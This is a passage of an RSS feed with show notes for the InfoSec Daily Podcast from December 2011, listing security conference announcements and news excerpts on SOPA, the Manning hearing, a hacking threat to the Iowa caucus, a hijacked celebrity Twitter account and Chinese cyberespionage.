	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.globalpost.com/dispatch/news/regions/americas/united-states/111216/anonymous-hackers-sopa-vote-congress"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.globalpost.com/dispatch/news/regions/americas/united-states/111216/anonymous-hackers-sopa-vote-congress</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#fafafa;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In response to a bill now before Congress, which opponents say would dramatically erode Internet freedom, the free and fair use of copyrighted material and online privacy, hacker groups have begun to publicly threaten to launch attacks on US government workers and websites.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#fafafa;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The US House Judiciary Committee debated for a second day on Friday the Stop Online Piracy Act (SOPA), a bill that would bestow the US Department of Justice and individual copyright holders with unprecedented powers to shut down websites and crack down on users for what they deem to be violations of copyrights.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#fafafa;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The vote was postponed after day two of the debate after a wayward tweet derailed talks on Thursday. Rep. Steve King (R &ndash; Iowa) tweeted that Rep. Sheila Jackson Lee (D &ndash; TX) was &ldquo;boring.&rdquo; The hearing then grinded to a halt after Jackson Lee took issue with the offensive comment. The hearing fell behind schedule and the vote was delayed until Dec. 21.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#fafafa;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The delay will give the bill&rsquo;s detractors more time to organize its calls for the bill to be dropped. The bill as it now stands appears to have enough votes to pass the House of Representatives and move on to the Senate.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#fafafa;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous hackers are lining up to take down the US government if SOPA passes. &nbsp;From the picture, it looks like must be lining up at the Apple store&#8230;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.usatoday.com/news/military/story/2011-12-19/manning-wikileaks-hearing/52074010/1"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.usatoday.com/news/military/story/2011-12-19/manning-wikileaks-hearing/52074010/1</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Computer forensics investigators testified Monday that the computer of a soldier accused of sharing military secrets contained thousands of sensitive files and logs of conversations between himself and a former hacker who turned him in.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Investigators said they found evidence Army Pfc. Bradley Manning downloaded thousands diplomatic cables, Guantanamo assessment documents, video from a controversial 2007 airstrike in Baghdad and military records of a 2009 U.S. airstrike in Gerani, Afghanistan, in which dozens of civilians were found dead.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As the evidentiary hearing for Manning entered its fourth day, the government had called 13 witnesses and was expected to ask eight more to testify before the defense presents its case. Expected to last several more days, the hearing will help determine whether Manning should be court-martialed on 22 charges, including aiding the enemy. If convicted at court-martial, Manning could face life in prison.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Manning, 24, of Crescent, Okla., is accused of giving the secrets-sharing website WikiLeaks a trove of government material while working as an intelligence analyst in Iraq in 2009 and 2010, including Iraq and Afghanistan war logs, and State Department cables.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://blog.al.com/wire/2011/12/hacker_threat_to_iowa_caucus_v.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.al.com/wire/2011/12/hacker_threat_to_iowa_caucus_v.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Taking seriously an apparent threat from a notorious collective of computer hackers, the Iowa Republican Party is boosting the security of the electronic systems it will use in two weeks to count the first votes of the 2012 presidential campaign.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Investigators don&#39;t know if the threat is authentic, but it has nonetheless led the state party to confront a worst-case scenario. Their fear: an Iowa caucus marred by hackers who corrupt the database used to gather votes and crash the website used to inform the public about results that can shape the campaign for the White House.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;With the eyes of the media on the state, the last thing we want to do is have a situation where there is trouble with the reporting system,&quot; said Wes Enos, a member of the Iowa GOP&#39;s central committee and the political director for Minnesota Rep. Michele Bachmann&#39;s campaign in the state. &quot;We don&#39;t want that to be the story.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Confident in the existing safeguards protecting the vote count itself, Enos and other members of the party central committee told The Associated Press they recently authorized additional security measures aimed at ensuring hackers are unable to delay the release of caucus results.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The state GOP fears such a delay could disrupt the traditional influence of Iowa&#39;s first-in-the-nation vote. Candidates who do well tend to gain momentum in the presidential race, while those finishing at the back of the pack may drop out. Experts in computer security said such concerns are valid.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;It&#39;s very clear the data consolidation and data gathering from the caucuses, which determines the headlines the next morning, who might withdraw or resign from the process, all of that is fragile,&quot; said Douglas Jones, a computer science professor at the University of Iowa who has consulted for both political parties.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;If I were one of these &#39;hacktivists&#39; who had no scruples, I would be really strongly tempted to see if I could get into the computer and see if I could make &#39;SpongeBob SquarePants&#39; win.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://community.websense.com/blogs/securitylabs/archive/2011/12/19/lady-gaga-s-twitter-account-tweeting-links-to-survey-scam.aspx"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://community.websense.com/blogs/securitylabs/archive/2011/12/19/lady-gaga-s-twitter-account-tweeting-links-to-survey-scam.aspx</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Twitter account of famous singer Lady Gaga has apparently been hacked. It&#39;s being used by attackers to lure her more than 17 million followers to click on a link:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After a number of redirects, the link ultimately leads to a survey scam that is designed to harvest personal information:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The first link uses the URL shortener bit.ly, which has suspended the link as &quot;being potentially problematic.&quot; Although this should keep most users away from the scam for now, the attackers are likely to post new tweets that include phishing or malicious URLs as long as they have control of the account. The Twitter community has responded by sharing the fact that Lady Gaga&#39;s account shouldn&#39;t be trusted. This led to #stophackinggaga as a trending Twitter topic at the time this post was written. As always, be careful of links you click on Twitter, even when they appear to come from trusted accounts.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://seattletimes.nwsource.com/html/businesstechnology/2017026763_chinacyberwar18.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://seattletimes.nwsource.com/html/businesstechnology/2017026763_chinacyberwar18.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google and Intel were logical targets for China-based hackers, given the solid-gold intellectual property data stored in their computers. An attack by cyberspies on iBahn, a provider of Internet services to hotels, takes some explaining.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">iBahn provides broadband business and entertainment access to guests of Marriott International and other hotel chains, including multinational companies that hold meetings on site. Breaking into iBahn&#39;s networks, according to a senior U.S. intelligence official familiar with the matter, may have let hackers see millions of confidential emails, even encrypted ones, as executives from Dubai to New York reported back on everything from new-product development to merger negotiations.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">More worrisome, hackers might have used iBahn&#39;s system as a launchpad into corporate networks that are connected to it, using traveling employees to create a backdoor to company secrets, said Nick Percoco, head of Trustwave&#39;s SpiderLabs, a security firm.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hackers&#39; interest in companies as small as Salt Lake City-based iBahn illustrates the breadth of China&#39;s spying against firms in the U.S. and elsewhere.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The networks of at least 760 companies, research universities, Internet service providers and government agencies were hit over the last decade by the same group of China-based cyberspies.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The companies, including firms such as Research in Motion and Boston Scientific, range from some of the largest corporations to niche innovators in sectors like aerospace, semiconductors, pharmaceuticals and biotechnology, according to intelligence data obtained by Bloomberg News.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;They are stealing everything that isn&#39;t bolted down, and it&#39;s getting exponentially worse,&quot; said U.S. Rep. Mike Rogers, a Michigan Republican who is chairman of the Permanent Select Committee on Intelligence.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">China has made industrial espionage an integral part of its economic policy, stealing company secrets to help it leapfrog over U.S. and other foreign competitors to further its goal of becoming the world&#39;s largest economy, U.S. intelligence officials have concluded in a report released last month.</span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-549-sopa-manning-iowa-lady-gaga-china/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3287/0/infosec-daily-podcast-episode-549.mp3" length="21495158" type="audio/mpeg" />
		<itunes:duration>0:44:44</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 549 for December 19, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Beau Woods, Karthik Rangarajan, Geordy Rostad, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know an[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 549 for December 19, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Beau Woods, Karthik Rangarajan, Geordy Rostad, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://www.globalpost.com/dispatch/news/regions/americas/united-states/111216/anonymous-hackers-sopa-vote-congress
	In response to a bill now before Congress, which opponents say would dramatically erode Internet freedom, the free and fair use of copyrighted material and online privacy, hacker groups have begun to publicly threaten to launch attacks on US government workers and websites.
	The US House Judiciary Committee debated for a second day on Friday the Stop Online Piracy Act (SOPA), a bill that would bestow the US Department of Justice and individual copyright holders with unprecedented powers to shut down websites and crack down on users for what they deem to be violations of copyrights.
	The vote was postponed after day two of the debate after a wayward tweet derailed talks on Thursday. Rep. Steve King (R &#8211; Iowa) tweeted that Rep. Sheila Jackson Lee (D &#8211; TX) was &#8220;boring.&#8221; The hearing then grinded to a halt after Jackson Lee took issue with the offensive comment. The hearing fell behind schedule and the vote was delayed until Dec. 21.
	The delay will give the bill&#8217;s detractors more time to organize its calls for the bill to be dropped. The bill as it now stands appears to have enough votes to pass the House of Representatives and move on to the Senate.
	&#8230;.
	Anonymous hackers are lining up to take down the US government if SOPA passes. &#160;From the picture, it looks like must be lining up at the Apple store&#8230;
	&#8230;.
	Source: http://www.usatoday.com/news/military/story/2011-12-19/manning-wikileaks-hearing/52074010/1
	Computer forensics investigators testified Monday that the computer of a soldier accused of sharing military secrets contained thousands of sensitive files and logs of conversations between himself and a former hacker who turned him in.
	Investigators said they found evidence [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 548 &#8211; MS11-095, Offensive Strikes, Automated Bank Robbery &amp; SOPA STOPPA</title>
		<link>http://www.isdpodcast.com/episode-548-ms11-095-offensive-strikes-automated-bank-robbery-sopa-stoppa</link>
		<comments>http://www.isdpodcast.com/episode-548-ms11-095-offensive-strikes-automated-bank-robbery-sopa-stoppa#comments</comments>
		<pubDate>Sat, 17 Dec 2011 01:49:43 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3284</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 548 for December 16, 2011. &#160;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Themson Mester. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.2792403629824465" style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 548 for December 16, 2011. &nbsp;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Themson Mester.</span></p>
<p>	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
